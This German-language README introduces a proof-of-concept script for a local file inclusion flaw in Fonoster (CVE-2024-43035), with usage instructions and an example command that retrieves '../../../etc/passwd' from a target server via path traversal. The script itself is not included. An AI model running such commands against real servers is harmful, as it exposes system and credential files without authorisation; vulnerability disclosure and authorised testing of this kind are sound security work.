
Proof-of-Concept-Exploit für die Fonoster-LFI-Schwachstelle (CVE-2024-43035)
Dieses Repository enthält ein Proof-of-Concept-Skript (PoC), das eine Local-File-Inclusion-Schwachstelle in Fonoster demonstriert. Dieses Tool dient ausschließlich Bildungs- und autorisierten Testzwecken.
Um eine lokale Datei vom Server auszulesen:
python3 fonoster_lfi_poc.py --url <fonoster_server_url> --path <file_path_to_retrieve>
Beispiel:
python3 fonoster_lfi_poc.py --url http://example.com --path "../../../etc/passwd"